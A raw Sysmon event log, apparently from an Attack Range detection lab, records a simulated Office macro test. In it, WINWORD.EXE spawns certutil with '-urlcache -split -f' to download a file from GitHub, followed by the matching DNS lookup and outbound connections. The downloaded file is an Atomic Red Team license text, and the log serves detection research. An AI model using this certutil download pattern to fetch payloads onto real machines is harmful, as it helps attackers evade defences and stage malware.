12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293078Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293077Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293076Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293075Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293074Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293073Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.271{BEA10069-02B8-6088-1C2A-00000000BB01}71084720C:\Windows\system32\conhost.exe{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293072Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-D4AB-6086-4301-00000000BB01}33842040C:\Windows\system32\csrss.exe{BEA10069-02B8-6088-1C2A-00000000BB01}7108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293071Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293070Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293069Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293068Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293067Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293066Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.255{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\SYSTEM32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(00000145103363F2) 154100x8000000000000000293065Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.246{BEA10069-02B8-6088-1B2A-00000000BB01}2272C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txtC:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o "" 10341000x8000000000000000293064Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:28.240{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441483Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:28.444{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF72A5AE29FF1FF12CE5772AAFC461D2,SHA256=1D2DDC2763804BD5A08C2B5653DD6F26FF8C40FB8A22E729FDF2B96CCB248DF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441482Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:28.254{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441481Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:28.254{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441488Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:29.690{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=094C64F7797B8B0D08E2CD63D4E3FB35,SHA256=E92212B820DD21BA399B1534ECBC15E9BA8CB03191C1A2AC1A34ED321EC44C92,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293102Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.828{00000000-0000-0000-0000-000000000000}2272<unknown process>-tcptruefalse10.0.1.15win-host-96.attackrange.local50659-false185.199.109.133cdn-185-199-109-133.github.com443https 354300x8000000000000000293101Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.649{00000000-0000-0000-0000-000000000000}2272<unknown process>-tcptruefalse10.0.1.15win-host-96.attackrange.local50658-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x8000000000000000293100Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:29.520{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFA681674474D19FB6219986D56C1876,SHA256=63EFAEACCA808756901913BF195195AA7395A41746A6B9B7E40291163E5B1EDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293099Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:29.439{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293098Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:29.004{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B79F0227C04234F3A83E2E3753FBBA,SHA256=51A9771B988CA4FE52325D0080E65DD8128E9CC787B326458DA978ED9B0E18FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441487Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:25.681{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62429-false10.0.1.12-8000- 10341000x8000000000000000441486Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:29.255{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441485Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:29.255{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441491Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:30.694{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484B02BCA858843F126982BB23F07CA1,SHA256=EADDF63C023707AC34AE36FD3CBD59845FF514F224E3FE18F83AF0F94D93D8D5,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000293105Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:27.642{00000000-0000-0000-0000-000000000000}2272raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;<unknown process> 10341000x8000000000000000293104Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:30.106{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293103Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:30.021{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46FE2C4ED4EEB67842F8ACEEA8D489D,SHA256=303AA8088D4D8CE16A22297C2317E6F8E3F7EF84F2952AE2C4DFC31881C4401D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441490Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:30.256{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441489Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:30.256{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441494Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:31.699{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37EEF5FD7DCA7BF606ABA274D0B312E9,SHA256=C1D7CAFC5538A27E819BA39B2247741096AA0C3169EEB55D8BE4E0769C0D00EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293106Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:31.041{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E59BC8C09EF431E3836A029847790461,SHA256=CD72966645505464E232EF01F8B449D39D4C388D78D3646A9FBD361CE93A33D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441493Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:31.257{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441492Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:31.257{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441497Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:32.926{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B156D23A37C525353B2E9BCE61DB47E,SHA256=E18FB5EAF855AE79568D889E3888EB3D6E22617811DA7C07E4B27F4F2A049039,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293138Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 